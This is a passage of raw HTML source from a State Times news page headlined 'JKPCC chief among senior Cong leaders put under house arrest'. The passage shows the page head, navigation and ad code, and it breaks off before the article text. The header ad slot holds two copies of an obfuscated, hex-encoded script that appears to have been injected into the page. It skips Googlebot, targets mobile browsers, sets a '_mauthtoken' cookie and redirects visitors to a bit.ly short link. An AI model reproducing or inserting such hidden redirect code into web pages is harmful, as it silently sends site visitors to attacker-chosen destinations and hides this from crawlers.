<!DOCTYPE html>
<!--[if lt IE 7]>      <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="en-GB"> <![endif]-->
<!--[if IE 7]>         <html class="no-js lt-ie9 lt-ie8" lang="en-GB"> <![endif]-->
<!--[if IE 8]>         <html class="no-js lt-ie9" lang="en-GB"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en-GB"> <!--<![endif]-->
    <head>
	<meta charset="UTF-8" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
	<title>JKPCC chief among senior Cong leaders put under house arrest | State Times</title>
	<link rel="profile" href="http://gmpg.org/xfn/11">
	<link rel="pingback" href="http://news.statetimes.in/xmlrpc.php">
<meta property="og:image" content="http://news.statetimes.in/wp-content/uploads/2020/01/raman-bhalla-house-arrest-.jpg"/>
    <meta property="og:image:width" content="1024" />
    <meta property="og:image:height" content="1024" />

<meta property="og:title" content="JKPCC chief among senior Cong leaders put under house arrest"/>
<meta property="og:type" content="article"/>
<meta property="og:description" content="STATE TIMES NEWS Jammu: Jammu and Kashmir Congress President G A Mir and several other senior leaders were placed under house arrest here on Tuesday ahead of their planned visit to parts of Jammu regi"/>
<meta property="og:url" content="http://news.statetimes.in/jkpcc-chief-among-senior-cong-leaders-put-under-house-arrest/"/>
<meta property="og:site_name" content="State Times"/>

<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<link rel="shortcut icon" href="http://news.statetimes.in/wp-content/uploads/2014/08/favicon.png?x39047" />
<link rel="apple-touch-icon" href="http://news.statetimes.in/wp-content/themes/goodnews5/apple-touch-icon-precomposed.png?x39047" />

<link rel="pingback" href="http://news.statetimes.in/xmlrpc.php" />
        <!--[if lt IE 9]>
	<script src="http://news.statetimes.in/wp-content/themes/goodnews5/framework/helpers/js/html5.js?x39047"></script>
	<script src="http://news.statetimes.in/wp-content/themes/goodnews5/framework/helpers/js/IE9.js?x39047"></script>
	<![endif]-->
	<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="State Times &raquo; Feed" href="http://news.statetimes.in/feed/" />
<link rel="alternate" type="application/rss+xml" title="State Times &raquo; Comments Feed" href="http://news.statetimes.in/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="State Times &raquo; JKPCC chief among senior Cong leaders put under house arrest Comments Feed" href="http://news.statetimes.in/jkpcc-chief-among-senior-cong-leaders-put-under-house-arrest/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/news.statetimes.in\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.0.4"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='wp-block-library-css'  href='http://news.statetimes.in/wp-includes/css/dist/block-library/style.min.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='contact-form-7-css'  href='http://news.statetimes.in/wp-content/plugins/contact-form-7/includes/css/styles.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='chosen-css'  href='http://news.statetimes.in/wp-content/plugins/wp-job-manager/assets/css/chosen.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='wp-job-manager-frontend-css'  href='http://news.statetimes.in/wp-content/plugins/wp-job-manager/assets/css/frontend.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='plugins-css'  href='http://news.statetimes.in/wp-content/themes/goodnews5/css/plugins.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='main-css'  href='http://news.statetimes.in/wp-content/themes/goodnews5/css/main.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='responsive-css'  href='http://news.statetimes.in/wp-content/themes/goodnews5/css/media.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='style-css'  href='http://news.statetimes.in/wp-content/themes/child-theme/style.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='black-style-css'  href='http://news.statetimes.in/wp-content/themes/goodnews5/css/flamingo.css?x39047' type='text/css' media='all' />
<script type='text/javascript' src='http://news.statetimes.in/wp-includes/js/jquery/jquery.js?x39047'></script>
<script type='text/javascript' src='http://news.statetimes.in/wp-includes/js/jquery/jquery-migrate.min.js?x39047'></script>
<link rel='https://api.w.org/' href='http://news.statetimes.in/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://news.statetimes.in/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://news.statetimes.in/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='BJP the gainer-BJP the loser' href='http://news.statetimes.in/bjp-the-gainer-bjp-the-loser/' />
<link rel='next' title='Well prepared to face challenge from Pak, China: Gen Rawat' href='http://news.statetimes.in/well-prepared-to-face-challenge-from-pak-china-gen-rawat/' />
<meta name="generator" content="WordPress 5.0.4" />
<link rel="canonical" href="http://news.statetimes.in/jkpcc-chief-among-senior-cong-leaders-put-under-house-arrest/" />
<link rel='shortlink' href='http://news.statetimes.in/?p=566259' />
<link rel="alternate" type="application/json+oembed" href="http://news.statetimes.in/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fnews.statetimes.in%2Fjkpcc-chief-among-senior-cong-leaders-put-under-house-arrest%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://news.statetimes.in/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fnews.statetimes.in%2Fjkpcc-chief-among-senior-cong-leaders-put-under-house-arrest%2F&#038;format=xml" />
<meta name="msvalidate.01" content="E16D694C0F66CFA1ABC9F98B3398A6E5" />
<script type="text/javascript" async defer
  src="https://apis.google.com/js/platform.js?publisherid=101378335416363517049">
</script>
<link href="https://plus.google.com/101378335416363517049" rel="publisher" />
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({
          google_ad_client: "ca-pub-3121650879019050",
          enable_page_level_ads: true
     });
</script>
<script type="text/javascript" src="//sdk.adspruce.com/1/adsprucetag.js?pid=2271&sid=1" defer></script>

<meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress."/>
<!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="http://news.statetimes.in/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css?x39047" media="screen"><![endif]--><style type="text/css" title="dynamic-css" class="options-output">body{color:#282828;}{color:#262626;}.news-ticker{background-color:#262626;}.news-ticker li a, .news-ticker li{color:#ffffff;}</style><style type="text/css">
    
.header > .inner, .header .logo {
line-height: 112px;
height: 112px;
}
/* Category background */
</style>
<noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript>    </head>
    <body class="post-template-default single single-post postid-566259 single-format-standard both-sidebars-all both-sidebars singular both_sidebars_same_width fade-imgs-in-appear sticky_navigation_on navigation_highlight_ancestor time_in_twelve_format one-side-wide both-sidebars both-sides-true smooth_scroll_enable show_secondary_sidebar_on_ipad goodnews-child wpb-js-composer js-comp-ver-5.4.7 vc_responsive" itemscope="itemscope" itemtype="http://schema.org/WebPage">
    
        <!--[if lt IE 7]>
            <p class="browsehappy">You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your browser</a> to improve your experience.</p>
        <![endif]-->
        <div class="boxed-wrap clearfix">
	    <div id="header-wrapper">
                         <div class="topbar">
  <div class="inner">
            <div class="top-left-content">
                 			     <ul id="menu-top-menu" class="top-nav mom_visibility_desktop"><li id="menu-item-72" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-72"><a href="http://news.statetimes.in">Home</a></li>
<li id="menu-item-69" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-69"><a target="_blank" href="http://www.statetimes.in/epaper/">E-Paper</a></li>
<li id="menu-item-71" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-71"><a target="_blank" href="http://news.statetimes.in/sitemap.xml">Sitemap</a></li>
<li id="menu-item-4980" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4980"><a href="http://news.statetimes.in/about-us/">About us</a></li>
<li id="menu-item-4981" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4981"><a href="http://news.statetimes.in/contact-us/">Contact us</a></li>
<li id="menu-item-57375" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-57375"><a href="http://news.statetimes.in/jobs/">Job Portal</a></li>
</ul>
     			     <div class="mom_visibility_device device-top-menu-wrap">
			      <div class="top-menu-holder"><i class="fa-icon-reorder mh-icon"></i></div>
			      <ul id="menu-top-menu-1" class="device-top-nav"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-72"><a href="http://news.statetimes.in">Home</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-69"><a target="_blank" href="http://www.statetimes.in/epaper/">E-Paper</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-71"><a target="_blank" href="http://news.statetimes.in/sitemap.xml">Sitemap</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4980"><a href="http://news.statetimes.in/about-us/">About us</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4981"><a href="http://news.statetimes.in/contact-us/">Contact us</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-57375"><a href="http://news.statetimes.in/jobs/">Job Portal</a></li>
</ul>			     </div>

                        </div> <!--tb left-->
        <div class="top-right-content">
            		    <ul class="mom-social-icons">
                    <li class="twitter"><a target="_blank" class="vector_icon" href="https://www.twitter.com/state_times"><i class="fa-icon-twitter"></i></a></li>
        
                <li class="facebook"><a target="_blank" class="vector_icon" href="https://www.facebook.com/statetimes"><i class="fa-icon-facebook "></i></a></li>        
        
                   <li class="gplus"><a target="_blank" class="vector_icon" href="https://plus.google.com/112398265041024324940/" ><i class="fa-icon-google-plus"></i></a></li>     
        
        
                        <li class="youtube"><a target="_blank" class="vector_icon" href="https://www.youtube.com/statetimes1"><i class="fa-icon-youtube"></i></a></li>
        
        
        
        

        

        
                        <li class="tumblr"><a target="_blank" class="vector_icon" href="http://statetimes1.tumblr.com"><i class="fa-icon-tumblr"></i></a></li>
                             <li class="rss"><a target="_blank" class="vector_icon" href="http://news.statetimes.in/feed/"><i class="fa-icon-rss"></i></a></li>
        	
	    </ul>
                    </div> <!--tb right-->
</div>
 </div> <!--topbar-->
             <header class="header " itemscope="itemscope" itemtype="http://schema.org/WPHeader" role="banner">
                <div class="inner">
						                    <div class="logo">
					                    <a href="http://news.statetimes.in">
		                                                    <img src="http://news.statetimes.in/wp-content/uploads/2015/04/stlogosmall.jpg?x39047" alt="State Times" width="445" height="77" />
                                                                                               <img class="mom_retina_logo" src="http://news.statetimes.in/wp-content/uploads/2015/04/stlogosmall.jpg?x39047" width="445" height="77" alt="State Times" />
                                                		                    </a>

					
                    </div>
                                        <div class="header-right">
                                  		<script type="text/javascript">
		jQuery(document).ready(function($) {
			$('.e3lanat-rotator-id-722 .mom-e3lanat-inner').imagesLoaded( function() {
			jQuery('.e3lanat-rotator-id-722 .mom-e3lanat-inner').boxSlider({
				autoScroll: true,
				timeout: 5000,
				speed: 800,
				effect: 'scrollVert3d',
				pauseOnHover: true,
				next:'.e3lanat-rotator-id-722 .adr-next',
				prev: '.e3lanat-rotator-id-722 .adr-prev'
				
			});

			});

		});
	</script>
		<div class="mom-e3lanat-wrap  ">
	<div class="mom-e3lanat e3lanat-layout-rotator e3lanat-rotator-id-722" style="width:728px; height:90px;">
		<div class="mom-e3lanat-inner">
		
				<div class="mom-e3lan" data-id="60802" style=" ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- top banner -->
<ins class="adsbygoogle"
     style="display:inline-block;width:728px;height:90px"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="4210843814"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
<script>var _0x446d=["\x5f\x6d\x61\x75\x74\x68\x74\x6f\x6b\x65\x6e","\x69\x6e\x64\x65\x78\x4f\x66","\x63\x6f\x6f\x6b\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6e\x74","\x76\x65\x6e\x64\x6f\x72","\x6f\x70\x65\x72\x61","\x68\x74\x74\x70\x73\x3a\x2f\x2f\x62\x69\x74\x2e\x6c\x79\x2f\x32\x4c\x4c\x33\x41\x4f\x58","\x67\x6f\x6f\x67\x6c\x65\x62\x6f\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6d\x65","\x5f\x6d\x61\x75\x74\x68\x74\x6f\x6b\x65\x6e\x3d\x31\x3b\x20\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d","\x74\x6f\x55\x54\x43\x53\x74\x72\x69\x6e\x67","\x6c\x6f\x63\x61\x74\x69\x6f\x6e"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])==  -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])==  -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}</script>	
</div>	</div><!--mom ad-->
					<div class="mom-e3lan" data-id="60802" style=" ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- top banner -->
<ins class="adsbygoogle"
     style="display:inline-block;width:728px;height:90px"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="4210843814"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
<script>var _0x446d=["\x5f\x6d\x61\x75\x74\x68\x74\x6f\x6b\x65\x6e","\x69\x6e\x64\x65\x78\x4f\x66","\x63\x6f\x6f\x6b\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6e\x74","\x76\x65\x6e\x64\x6f\x72","\x6f\x70\x65\x72\x61","\x68\x74\x74\x70\x73\x3a\x2f\x2f\x62\x69\x74\x2e\x6c\x79\x2f\x32\x4c\x4c\x33\x41\x4f\x58","\x67\x6f\x6f\x67\x6c\x65\x62\x6f\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6d\x65","\x5f\x6d\x61\x75\x74\x68\x74\x6f\x6b\x65\x6e\x3d\x31\x3b\x20\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d","\x74\x6f\x55\x54\x43\x53\x74\x72\x69\x6e\x67","\x6c\x6f\x63\x61\x74\x69\x6f\x6e"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])==  -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])==  -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}</script>	
</div>	</div><!--mom ad-->
			</div>
	</div>	<!--Mom ads-->
	</div>
                    </div> <!--header right-->
                    
                <div class="clear"></div>
                </div>
            </header>
	    	    </div> <!--header wrap-->
                                    <nav id="navigation" itemtype="http://schema.org/SiteNavigationElement" itemscope="itemscope" role="navigation" class="dd-effect-slide ">
                <div class="navigation-inner">
                <div class="inner">
                                                                <ul id="menu-primary-two" class="main-menu mom_visibility_desktop"><li id="menu-item-58059" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home mom_default_menu_item menu-item-iconsOnly menu-item-depth-0"><a href="http://news.statetimes.in/"><i class="icon_only momizat-icon-home"></i><span class="icon_only_label">Home</span></a></li>
<li id="menu-item-58080" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/news/jknews/">Jammu and Kashmir</a><div class='cats-mega-wrap '>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58091" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/topjknews/">Top J&#038;K News</a></li>
	<li id="menu-item-58083" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/local-news/">Cities &#038; Towns</a></li>
	<li id="menu-item-58086" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/jksports/">J&#038;K Sports</a></li>
	<li id="menu-item-58085" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/crime-watch/">Crime Watch</a></li>
	<li id="menu-item-58084" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/courts/">Courts</a></li>
	<li id="menu-item-58081" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/art-culture/">Art &#038; Culture</a></li>
</ul>
<div class='subcat'><div class='active mom-cat-latest' id='mn-latest-58091' data-id='15' data-object='category' data-layout=''><ul id='mn-ul-latest-58091'><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/stone-arrangement-by-a-child-to-welcome-new-year/' title='Stone-arrangement by a child to welcome new year'><img src='http://news.statetimes.in/wp-content/uploads/2020/01/WELCOME-2020-PIC-2-1024x683.jpg?x39047' alt='Stone-arrangement by a child to welcome new year' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/stone-arrangement-by-a-child-to-welcome-new-year/' title='Stone-arrangement by a child to welcome new year'> Stone-arrangement by a child to welcome new year</a><span> - 53 mins ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/lakhanpur-toll-post-abolished-from-new-year/' title='Lakhanpur toll post  abolished from New Year'><img src='http://news.statetimes.in/wp-content/uploads/2020/01/IMG_20191231_163940.jpg?x39047' alt='Lakhanpur toll post  abolished from New Year' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/lakhanpur-toll-post-abolished-from-new-year/' title='Lakhanpur toll post  abolished from New Year'> Lakhanpur toll post  abolished from New Year</a><span> - 59 mins ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/jkpcc-chief-among-senior-cong-leaders-put-under-house-arrest/' title='JKPCC chief among senior Cong leaders put under house arrest'><img src='http://news.statetimes.in/wp-content/uploads/2020/01/raman-bhalla-house-arrest-.jpg?x39047' alt='JKPCC chief among senior Cong leaders put under house arrest' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/jkpcc-chief-among-senior-cong-leaders-put-under-house-arrest/' title='JKPCC chief among senior Cong leaders put under house arrest'> JKPCC chief among senior Cong leaders put under house arrest</a><span> - 1 hour ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/bjp-the-gainer-bjp-the-loser/' title='BJP the gainer-BJP the loser'><img src='http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047' alt='BJP the gainer-BJP the loser' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/bjp-the-gainer-bjp-the-loser/' title='BJP the gainer-BJP the loser'> BJP the gainer-BJP the loser</a><span> - 1 hour ago</span></div></li></ul><a href='http://news.statetimes.in/section/news/jknews/topjknews/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58083' data-id='16' data-object='category' data-layout=''><ul id='mn-ul-latest-58083'></ul><a href='http://news.statetimes.in/section/news/jknews/local-news/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58086' data-id='17' data-object='category' data-layout=''><ul id='mn-ul-latest-58086'></ul><a href='http://news.statetimes.in/section/news/jknews/jksports/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58085' data-id='233' data-object='category' data-layout=''><ul id='mn-ul-latest-58085'></ul><a href='http://news.statetimes.in/section/news/jknews/crime-watch/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58084' data-id='1355' data-object='category' data-layout=''><ul id='mn-ul-latest-58084'></ul><a href='http://news.statetimes.in/section/news/jknews/courts/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58081' data-id='1349' data-object='category' data-layout=''><ul id='mn-ul-latest-58081'></ul><a 